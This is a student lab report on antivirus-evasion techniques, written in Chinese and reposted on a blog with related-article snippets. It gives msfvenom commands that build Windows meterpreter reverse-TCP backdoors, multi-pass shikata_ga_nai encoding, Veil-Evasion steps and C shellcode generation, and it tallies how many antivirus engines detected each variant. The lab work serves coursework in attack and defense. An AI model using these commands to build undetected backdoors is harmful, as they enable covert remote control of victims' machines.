20169205 2016-2017-2 《网络攻防技术》 免杀技术

最新推荐文章于 2022-11-08 21:39:10 发布
最新推荐文章于 2022-11-08 21:39:10 发布
阅读量152 收藏
点赞数
文章标签: python c/c++
原文链接:http://www.cnblogs.com/wule/p/6924353.html
版权

20169205 2016-2017-2 《网络攻防技术》 免杀技术

一、基础问题回答

(1)杀软是如何检测出恶意代码的?

  • 基于特征码的检测

恶意代码常常具有明显的特征码也就是一段数据,杀软检测到具有该特征码的程序就当作检测到了恶意代码。

  • 启发式恶意软件检测

  • 基于行为的恶意软件检测

如果一个程序的行为是带有恶意的行为,那么这个程序也会被认为是恶意代码。

(2)免杀是做什么?

使用一些方法使得恶意程序不被杀软和防火墙发现,避免被查杀。

(3)免杀的基本方法有哪些?

  • 改变特征码

对恶意代码进行加壳、用其他语言或编译器进行再编译,利用shellcode进行编码

  • 改变攻击行为

基于内存操作、减少对系统的修改、加入混淆作用的正常功能代码

实践总结与体会

此次实验使我深入了解了杀毒软件查杀的原理,以及恶意代码的伪装手段。发现即使安装了杀毒软件以及防火墙,还是不能完全的保证电脑是安全的。因此,了解相关恶意程序的原理和伪装手段对提高网络安全意识和增强病毒防护能力由很大的帮助。

离实战还缺些什么技术或步骤?

实际环境中,我们很难将后门程序移植进靶机中,这就需要把这个后门程序伪装后绑定到一些正规的程序中来让后门程序进入靶机。另外我们需要对靶机的状态进行跟踪。

实践过程记录

1.使用msf编码器直接生成一个后门程序

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.2.169 LPORT=5329 -f exe > 5329met-encoded.exe

文件传送到windows以后被查杀,找回后上传到virscan扫描,有21/39款杀软鉴定它为恶意代码
检测过程如图所示:

732832-20170531150321571-1546248705.png

732832-20170531150326805-467744323.png

2.使用msf编码器对恶意代码进行10次编码,并生成一个后门文件

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.15.128 LPORT=5329 -f exe > 5329met-encoded10.exe

文件传送到windows以后仍然被查杀
将.exe文件拷贝出来到靶机上,放在某个路径下(保证杀毒软件开启),发现被查杀,然后找回原文件。

使用msf编码器对恶意代码进行10次编码,并生成一个后门文件
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=172.16.2.169 LPORT=5329 -f exe > 5329met-encoded10.exe

文件传送到windows以后仍然被查杀

找回后上传到virscan扫描,有20/39款杀软鉴定它为恶意代码

732832-20170531150817977-892376140.png

732832-20170531150823321-969956882.png

对比查杀分析信息后发现其中一个名为Quickheal的杀软没有检测出多次编码后的恶意代码,说明这个杀软比较弱,不过也说明多次编码对个别杀软是有一定作用的,不过整体来讲对恶意代码成功植入靶机还是几率不大

3.使用veil-evasion免杀平台

kali原本没有veil-evasion ,所以需要先安装

sudo ape-get install veil-evasion

menu下依次输入语言、ip、端口号以及文件名等

use python/meterpreter/rev_tcp
set LHOST 172.16.2.169
generate
5329
1

将生成的可执行文件传送到windows,传送时windows杀软没有检测到文件为恶意代码并杀死它

在windows文件中找到恶意代码(5329.exe),上传到virscan扫描发现有10/39款杀软识别出它是恶意代码
732832-20170531151311602-1671019654.png

732832-20170531151244836-712221436.png

4.shellcode编程

在kali终端下生成一个c格式的十六进制数组,Ip为kali的

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.2.169 LPORT=443 -f c

按照实验教程模版在windows VS 中编写一个c语言的shellcode代码,并将kali中生成的带有kali ip的十六进制数组加入c代码的编写中,
kali中运行msf监听
732832-20170531151546071-1731624341.png

windows中VS调试shellcode代码,360杀软检测出木马,建议清除

将c代码上传到virscan扫描,结果显示0/39的杀毒软件鉴定为恶意代码,可能是该网站的病毒库没有及时更新,或者我们生成的恶意代码已经不太具有恶意代码的特征或行为不太像恶意代码
732832-20170531151708227-1402571820.png

学习进度条

时间学习时间目标实际进行时间
第一周88
第二周108.5
第三周1210.5
第四周1212
第五周1211
第六周1213
第七周1212
第八周1212
第九周1212
第十周1212
第十一周1211
第十二周1212
第十三周1210
第十四周1212

参考资料

转载于:https://www.cnblogs.com/wule/p/6924353.html

weixin_30849591
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
杀毒与免杀技术详解---白嫖党福音
01-15 1812
0x01 简介 不管是社工钓鱼,还是一句话木马getshell,远控,亦或者是反弹shell,都会遇到杀软waf这些大敌,当然主要还是杀软,因此我们不得不考虑免杀进而实现我们渗透测试目的。 0x02 概念 2.1 免杀类别 简单总结下我知道的免杀类别: 一句话木马绕狗(我觉得他不应该出现在这里,但为了致敬我学习的第一个免杀,把他放了出来) 文件不落地 shellcode加密 修改源码增加花指令 DLL加载 自定义加载器 指定特定的运行方式 加壳 当然还可以按照大的类别划分 静态扫描免杀
20155210 网络攻防技术 实验三 免杀原理与实践
weixin_30412577的博客
04-09 160
网络攻防技术 实验三 免杀原理与实践 使用msf生成后门程序的检测 首先我们对上次实验生成的后门exe,利用VirSCAN进行检测 如图: 然后我们利用msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.35.132(kali ip) lport=5210 x> 5210_backjar.jar,生成jar文件,进行检测。 ...
网络攻防》实验三:免杀原理与实践
weixin_33720956的博客
03-22 310
网络攻防》实验三:免杀原理与实践 世界上公认的第一个在个人电脑上广泛流行的病毒是1986年初诞生的大脑(C-Brain)病毒,编写该病毒的是一对巴基斯坦兄弟,两兄弟经营着一家电脑公司,以出售自己编制的电脑软件为生。当时,由于当地盗版软件猖獗,为了防止软件被任意非法拷贝,也为了追踪到底有多少人在非法使用他们的软件,于是在1986年年初,他们编写了 “大脑(Brain)”病毒,又被称为“巴基斯坦”病...
红队必备能-免杀
04-02
本套视频教程将通过远控工具介绍、基础原理讲解、免杀工具分析、实战四个模块内容,对免杀技术进行全面剖析讲解! 学完本课程可以免杀市面上%90的杀软,帮助大家对免杀技术有一个清晰的认知,能够掌握常用的免杀工具和进阶思路。
软件免杀技术介绍,完善杀毒技术
11-06
软件免杀技术介绍,完善杀毒技术。 软件免杀技术介绍,完善杀毒技术
65.远控免杀专题(65)-shellcode免杀实践1
08-03
【网络安全与Web安全专题——免杀技术解析】 在网络安全领域,免杀技术是黑客和安全研究人员用来规避反病毒软件检测的重要手段。本文主要探讨的是如何通过不同的方法实现shellcode(一段可以直接由CPU执行的机器码...
go-packer:golang打包二进制进行免杀
04-07
【标题】:“go-packer:使用Golang打包二进制以实现免杀功能” 在网络安全领域,免杀技术是开发者为了防止恶意软件检测...理解和掌握免杀技术,不仅可以提升软件的安全性,也能让我们更好地理解网络安全的攻防之道。
攻防演习防守技术方案.pptx
11-22
* 免杀、加密隧道等隐性攻击 * 钓鱼、水坑,利用“人”的弱点 * 目标单位周边 WIFI 攻击 * 业务链接单位攻击 * 安全产品、IOT 设备等漏洞利用 四、防守方认知 防守方认知逐渐清晰,部分参与过的单位能力大幅提升,...
红方人员实战手册 - 技术交流讨论
03-27
2. 攻防技术的共享与贡献:实战手册的编写目的之一是为了促进技术共享,鼓励红队及攻防研究人员共同进步,提升实战攻防水平。作者强调了无私奉献的重要性,以及通过实际行动为社区带来实际价值。 3. 法律与道德的...
针对常见杀毒软件应用技术免杀的理论分析
07-31
总的来说,免杀技术与反免杀技术是一场持续的攻防战。理解免杀的原理和方法,对于提升网络安全防护能力至关重要。同时,我们也应关注最新的安全动态,确保杀毒软件的及时更新和优化,以抵御日益复杂的网络威胁。
木马免杀浓缩精华版教程
07-13 828
木马免杀浓缩精华版教程木马免杀浓缩精华版教程第一部分:对国内外杀毒软件分析   在讲定位内存特征码前,先要分析国内外著名杀毒软件的内存查杀特点。大家在使用木马过程都会发现,内存查杀,一般都指得被瑞星的内存查杀。瑞星的内存查杀功能是同类杀毒软件中最强的一款杀毒软件。像强悍的卡巴,金山,等等它们的内存查杀意义不大,会制作免杀木马的人都知道,像这类杀毒软件,只要文件免杀,内存也就免杀了.还有江民也有
免杀技术-基础知识
weixin_34032827的博客
07-17 151
去年年底的一段时间,工作较清闲,当时对免杀做过一段时间研究。当时用的是hacksky的免杀教程。不敢说对免杀技术已经入门,但是当时做了一些学习笔记和学习感悟。hacksky的教程还是很不错的,因为工作的原因,当时没有全部看完,接下来有时间的话会把教程看完。这个大类以后主要记录关于免杀技术方面的文章。文东免杀工具包下载地址http://down.51cto.co...
免杀基础知识总结
w4y2'blog
04-27 1606
最近研究木马免杀,先了解一下基础的免杀知识,看了《杀不死的秘密》、《黑客免杀攻防》等免杀书籍,发现都大同小异,基本内容都是一样的,找特征码,修改特征码....我认为免杀还是要针对杀毒软件的查杀特性来做,所谓知己知彼,用在免杀上就特贴切。能够写在书本上的技术肯定不是最新的技术,反病毒软件肯定也有了应对措施,要想真正做到免杀,还是要通过其它渠道学习或是自己深入研究。但是,曾经的免杀方法并不是无用了,而
免杀技术有一套(免杀方法大集结)(Anti-AntiVirus)
热门推荐
anhkgg的专栏
05-22 1万+
00. 概述什么是免杀?来自百科的注解: 免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为“反-反病毒”,翻译为“反杀毒技术”。 有本比较有名的书,想详细学习的同学可以去看看。《黑客免杀攻防》 其实我大概好像只看过目录…( ╯□╰ ) 下面我介绍的是自己实践的一些方法,有没有效果,试试就
渗透测试-木马免杀的几种方式
MSB_WLAQ的博客
09-28 4568
前言 免杀,又叫免杀技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。免杀的基本特征是破坏特征,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。免杀技术也并不是十恶不赦的,例如,在软件保护所用的加密产品(比如壳)中,有一些会被杀毒软件认为是木马病毒;一些安全领域中的部分安全检测产品,也会被杀毒软件误杀,这时就需要免杀技术来应对这些不稳定因素。 1、裸
免杀技术详解
人生代码,代码人生。。。
11-19 4159
[免杀]免杀技术详解 杀毒软件奈我何                     ——免杀技术详解 逆流风 注:本文是去年投给黑客X档案的,与那期的主题乐园内容重叠,故未被选上,我也不另投其他杂志,转贴请注明出处,保留版权。 一、加壳免杀 壳按照性质不同可分为压缩壳和加密壳,使用压缩壳压缩过的软件体积会减小很多,我们常用的UPX、ASPACK、FSG就是压缩壳,加密壳是防止软件被破
攻防技术——源码免杀实战
最新发布
m0_60571990的博客
11-08 347
攻防技术——源码免杀实战
20169219《网络攻防免杀技术学习总结
weixin_30362233的博客
06-04 222
一、基础问题回答 (1)杀软是如何检测出恶意代码的? 1:基于特征码 一段特征码就是一段或多段数据。(如果一个可执行文件(或其他运行的库、脚本等)包含这样的数据则被认为是恶意代码) 杀毒软件有自己专门的特征码库,在检测一个程序是否是恶意代码时就看这个程序中的是否包含有特征码库中的特征码,如果有就进行查杀。但是特征码库并不是总是能第一时间更新,如果出现了特征码库中没有的新特征码,那么就无法通过这种比...
浅谈木马免杀(一)
谢公子的博客
04-27 5616
免杀 免杀技术全称为反杀毒技术Anti Anti- Virus(AV)简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广,其中包含反汇编、逆向工程、系统漏洞等黑客技术。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。 在实际的渗透过程中,目标机器上一般会有杀毒软件。如Windows Defender、360安全卫士、腾讯电脑管家...
黑客免杀攻防技术详解
本书不仅适用于黑客和网络安全专家,也适合对计算机安全感兴趣的读者,因为它以深入浅出的方式解析了复杂的免杀技术,有助于读者提升对网络安全的理解和应对能力。通过阅读这本书,读者将能更好地理解黑客的攻击策略...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值